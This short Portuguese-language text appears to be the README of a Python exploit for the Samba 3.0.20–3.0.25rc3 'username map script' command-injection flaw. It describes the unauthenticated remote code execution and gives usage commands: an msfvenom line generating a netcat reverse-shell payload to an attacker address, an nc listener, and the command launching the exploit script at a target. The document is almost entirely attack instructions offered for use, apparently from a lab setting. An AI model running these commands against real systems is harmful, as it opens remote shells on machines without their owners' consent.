
Exploit em Python para injeção de comando no 'username map script' do Samba 3.0.20-3.0.25rc3, fornecendo execução remota de código sem autenticação e reverse shell.
Este módulo explora uma vulnerabilidade de execução de comandos nas versões 3.0.20 a 3.0.25rc3 do Samba quando se utiliza a opção de configuração não padrão "username map script". Ao especificar um nome de usuário contendo metacaracteres de shell, os atacantes podem executar comandos arbitrários. Nenhuma autenticação é necessária para explorar esta vulnerabilidade, pois essa opção é usada para mapear os nomes de usuário antes da autenticação!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
